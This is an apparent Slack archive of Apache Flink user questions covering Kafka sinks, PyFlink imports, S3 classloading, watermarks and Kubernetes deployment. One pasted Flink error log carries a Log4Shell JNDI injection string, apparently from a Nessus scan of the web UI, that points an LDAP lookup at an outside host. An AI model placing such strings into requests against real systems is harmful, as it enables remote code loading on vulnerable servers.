raghav tandon
04/23/2023, 7:18 AMDataStream[Event] -> Window -> ProcessWindowFunction -> Datastream[Event2] -> Kafka Sink
Everything works fine but i am seeing in kafka some value is getting shuffled, i.e some other value is coming which is not intended.
I have a log before out.collect()
and things are getting printed correctly in that log line.
val userIds = events
.keyBy(e => e.client)
.window(TumblingProcessingTimeWindows.of(Time.seconds(1)))
.trigger(
PurgingTrigger.of(ProcessingTimeTrigger.create())
)
.process(userIdFetcher)
.setParallelism(1)
.uid(userIdFetcher.getClass().getSimpleName())
final class UserIdFetcher(config: UserIdFetcherConfig, failedOutputTag: OutputTag[ReadErrorEvent])
extends ProcessWindowFunction[WriteSuccessEvent, Diff, String, TimeWindow]
with Serializable{
elements.groupBy[String](update => update.command.id.get).foreach {
case (id, updates) =>
retryableProcess(
id,
context,
MongoBulkQuery(
key,
"User",
updates.map(update => update.command.body.identifiers).toList,
List(UserFields.Id)
),
out
)
}
def retryableProcess(
id: String,
context: Context,
query: MongoBulkQuery,
out: Collector[Diff],
attemptNumber: Int = 0
): Unit = {
mongoClient.client(query.client, query.collection).findUserIDs(query).onComplete {
case Success(values) =>
values
.map(user => user.getObjectId(MongoFields.Id).toHexString())
.grouped(config.maxBatchSize)
.foreach(userIdBatch => {
val diff = Diff(query.client, id, userIdBatch.toList)
out.collect(diff)
})
}
}
}
final case class Diff(
@JsonProperty("dbName") client: String,
@JsonProperty("id") collection: String,
@JsonProperty("add") add: List[String]
)
But in Kafka this value is getting changed randomly of a different id
which is also getting processed concurrently.Mali
04/23/2023, 9:09 AM�������`�[{"testId"... |
What should i do to remove these special characters ?
Many thanks.
Note;“I am getting “Failed to deserialize JSON ’�������`�” error” when i tried to read with json formatSlackbot
04/24/2023, 6:04 AMAmir Hossein Sharifzadeh
04/24/2023, 2:00 PMSlackbot
04/24/2023, 4:27 PMZachary Schmerber
04/24/2023, 5:44 PM// log source data from above Kafka Topic using JsonDeserializationSchema//
DataStream<ObjectNode> filteredStream = env.fromSource(logSource, WatermarkStrategy.noWatermarks(), "Kafka winlog Source");
DataStream<ObjectNode> winObjectStream = filteredStream.filter(node -> node.get("service_id").asText().equals("cdd31c3f-3b24-4526-848a-xxxxxxxxxxx"));
//Placeholder for logically mapping the new Object Stream
// Datastream that has sucessfully been transformed into Objects
winObjectStream.sinkTo(winEventSink);
Xavier
04/24/2023, 6:31 PMJeesmon Jacob
04/24/2023, 6:49 PMslotmanager.redundant-taskmanager-num: "1"
to run a redundant TM to speed up recovery. But what we have seen is flink is keep trying to schedule a new TM pod until redundant TM is ready every few seconds. So for some time we are seeing many extra TMs in Pending state and it is triggering unnecessary node autoscaling. Wondering if there is a configured interval for flink to detect if redundant TM is in Ready state. We are using flink operator for deployment.Nathanael England
04/24/2023, 7:50 PM-pyFiles
. The language here isn't too clear what is expected to happen. I'm getting import failures when I point to the directory that contains all my wheels.Nathanael England
04/24/2023, 8:27 PM.so
included in the path? I can see from logging my dependencies contents that the so is making it to the job.
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/cpp_message.py
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/_message.cpython-38-x86_64-linux-gnu.so
ERROR:root:/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/c6e62fed-b841-4a37-be6e-2001db67f477/usrlib/.deps/google/protobuf/pyext/__init__.py
The error I get is
ImportError: cannot import name '_message' from 'google.protobuf.pyext' (/tmp/pyflink/8d6f1590-3459-4e27-b118-2cf001999248/8541a21e-7834-425d-9a53-63350409a2a5/.deps/google/protobuf/pyext/__init__.py)
Matthew Kerian
04/25/2023, 12:10 AMAmenreet Singh Sodhi
04/25/2023, 4:48 AM023-04-23 18:13:29,093 ERROR org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler [] - Caught exception
java.io.IOException: Connection reset by peer
at sun.nio.ch.FileDispatcherImpl.read0(Native Method) ~[?:?]
at sun.nio.ch.SocketDispatcher.read(SocketDispatcher.java:39) ~[?:?]
at sun.nio.ch.IOUtil.readIntoNativeBuffer(IOUtil.java:276) ~[?:?]
at sun.nio.ch.IOUtil.read(IOUtil.java:233) ~[?:?]
at sun.nio.ch.IOUtil.read(IOUtil.java:223) ~[?:?]
at sun.nio.ch.SocketChannelImpl.read(SocketChannelImpl.java:358) ~[?:?]
at org.apache.flink.shaded.netty4.io.netty.buffer.PooledByteBuf.setBytes(PooledByteBuf.java:253) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.buffer.AbstractByteBuf.writeBytes(AbstractByteBuf.java:1132) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.socket.nio.NioSocketChannel.doReadBytes(NioSocketChannel.java:350) ~[event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:151) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:719) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:655) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:581) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:493) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:986) [event_executor-1.0-SNAPSHOT.jar:?]
at org.apache.flink.shaded.netty4.io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74) [event_executor-1.0-SNAPSHOT.jar:?]
2023-04-23 18:13:06,279 ERROR org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler [] - Error while responding to the http request.
java.text.ParseException: Unparseable date: "${jndi:<ldap://127.0.0.1#log4shell-generic-dXyfRkM647dI4bcPETOo.w.nessus.org/nessus>}"
at java.text.DateFormat.parse(DateFormat.java:395) ~[?:?]
at org.apache.flink.runtime.rest.handler.legacy.files.StaticFileServerHandler.respondToRequest(StaticFileServerHandler.java:210) ~[event_executor-1.0-SNAPSHOT.jar:?]
at ....
Any idea whats the possible issue is? ThanksGaurav Gupta
04/25/2023, 8:16 AMKrzysztof Chmielewski
04/25/2023, 12:34 PMCaused by: java.lang.LinkageError: loader constraint violation: when resolving method 'void org.apache.hadoop.util.SemaphoredDelegatingExecutor.(com.google.common.util.concurrent.ListeningExecutorService, int, boolean)' the class loader org.apache.flink.util.ChildFirstClassLoader @2486925f of the current class, org/apache/hadoop/fs/s3a/S3AFileSystem, and the class loader 'app' for the method's defining class, org/apache/hadoop/util/SemaphoredDelegatingExecutor, have different Class objects for the type com/google/common/util/concurrent/ListeningExecutorService used in the signature (org.apache.hadoop.fs.s3a.S3AFileSystem is in unnamed module of loader org.apache.flink.util.ChildFirstClassLoader @2486925f, parent loader 'app'; org.apache.hadoop.util.SemaphoredDelegatingExecutor is in unnamed module of loader 'app')
at org.apache.hadoop.fs.s3a.S3AFileSystem.create(S3AFileSystem.java:769)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:1118)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:1098)
at org.apache.hadoop.fs.FileSystem.create(FileSystem.java:987)
at io.delta.storage.S3SingleDriverLogStore.write(S3SingleDriverLogStore.java:299)
Any idea what can be causing this problem?
The same job is workign fine when trying to write into local path, so Im guessing that somethign with s3 plugin, some dependency issue.
Other job, that does not use Hive catalog can write to S3 on the same cluster.Viktor Hrtanek
04/25/2023, 12:36 PMAurora Nockert
04/25/2023, 12:41 PMWITH('properties.sasl.jaas.config'='…')
part, it would be nice if the query didn’t have to include the password. Is there some way to read it from an env variable, Java -D
properties, or a secret store?Aurora Nockert
04/25/2023, 12:42 PMSergey Postument
04/25/2023, 1:35 PMKafkaSink
to save my events in kafka, but during big load I getting flink app restart due to Caused by: org.apache.kafka.common.errors.RecordTooLargeException: The message is 6520160 bytes when serialized which is larger than the maximum request size you have configured with the max.request.size configuration.
what is pretty strange, since my messages I save via kafkaSink are json string with 2k char length maximum. not `6520160`bytes (6.5Mb). Pls point me to some documentation, what am I missing here? p.s. flink 1.14.6Mali
04/25/2023, 2:17 PM[{"abc":"123", "cde":"456"},{"efg":"789", "abc":"123"}]
Johannes Cox
04/25/2023, 2:51 PMCREATE TABLE
statement seem to disappear and we account the following error:
java.lang.RuntimeException: Record has Long.MIN_VALUE timestamp (= no timestamp marker). Is the time characteristic set to 'ProcessingTime', or did you forget to call 'DataStream.assignTimestampsAndWatermarks(...)'?
at org.apache.flink.streaming.api.windowing.assigners.SlidingEventTimeWindows.assignWindows(SlidingEventTimeWindows.java:80) ~[flink-streaming-java-1.16.1.jar:1.16.1]
at org.apache.flink.streaming.runtime.operators.windowing.WindowOperator.processElement(WindowOperator.java:284) ~[flink-streaming-java-1.16.1.jar:1.16.1]
...
We are currently fixing it by assigning timestamps a second time, after the conversion, but feel like this shouldn’t be necessary. Are we misunderstanding how watermarks work (especially in regard to mixing Table and Datastream API) or did we possibly encounter a bug? Is reassigning watermarks a valid approach in general?
To give more context, we’re using Flink 1.16.1 with the Java API and consume a Kinesis stream (although consuming from a file source yields the same behaviour). In the job we have two aggregations that use different SlidingEventTimeWindows
and an intervalJoin
to join the results.Christophe Bornet
04/25/2023, 4:57 PMTrystan
04/25/2023, 4:58 PMNathanael England
04/25/2023, 5:31 PMNodePort
? I can manually patch things after startup and access the web ui, but I'd like the web ui to be available on a consistent port. The only mention I see of NodePort
in the helm setup is for role based access control.Amir Hossein Sharifzadeh
04/25/2023, 6:30 PMTable raw_table = tableEnv.sqlQuery(data_query);
DataStream<Row> join_stream = tableEnv.toDataStream(raw_table);
SingleOutputStreamOperator<List<double[][][]>> outputStreamOperator = join_stream.process(new EMPADProcessor(commands, taskENT.getTaskId()));
where public void processElement(Row row, ProcessFunction<Row, List<double[][][]>>.Context context, Collector<List<double[][][]>> collector) throws Exception {
inside processElement
I am doing some data analysis which takes a few moments for every single message (row) and it this short processing time, causes duplicated messages and I don’t know why?Rion Williams
04/25/2023, 8:06 PMkafka_consumergroup_lag
) for one of my Flink jobs to determine when something upstream may have failed. This particular job doesn’t commit offsets at periodic intervals and the point of degradation isn’t a static value that might apply across all environments (so I can’t simply use something like kafka_consumergroup_lag{topic="topic-for-flink"} > $someThreshold
).
Does anyone have any ideas on this front? I’m basically just trying to set up an alert if my consumer lag for this particular job purely increases for an hour. I’ve tried a few different approaches involving derivatives, etc. but haven’t had much luck thus far.kingsathurthi
04/26/2023, 5:42 AMWarning [IST0117] (Deployment f0/flink-kubernetes-operator) No service associated with this deployment. Service mesh deployments must be associated with a service.
Info [IST0118] (Service f0/pod1-ingester) Port name ingester (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod1-rest) Port name rest (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod2-ingester) Port name ingester (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Info [IST0118] (Service f0/pod2-rest) Port name rest (port: 8081, targetPort: 8081) doesn't follow the naming convention of Istio port.
Kevin T
04/26/2023, 5:59 AM<https://nightlies.apache.org/flink/flink-docs-master/docs/flinkdev/ide_setup/>
instructions.
but on step 7, when i executed mvn clean package -DskipTests
i'm getting
[ERROR] Failed to execute goal net.alchim31.maven:scala-maven-plugin:3.2.2:testCompile (scala-test-compile) on project flink-scala_2.12: wrap: org.apache.commons.exec.ExecuteException: Process exited with an error: 240 (Exit value: 240) -> [Help 1]
i have Scala 2.12.17, JDK 11, Maven 3.9.0 installed
How do I fix this issue?chankyeong won
04/26/2023, 7:29 AMMySink
class on the DataStream in my flink application’s main method?Marcus Baule
04/26/2023, 9:00 AMdeserialization_schema = AvroRowDeserializationSchema(
avro_schema_string=schema_str_source
)
i receive an error when executing
org.apache.flink.avro.shaded.org.apache.avro.AvroRuntimeException: Malformed data. Length is negative: -1
Thanks and cheecrs,
marcusSlackbot
04/26/2023, 9:45 AM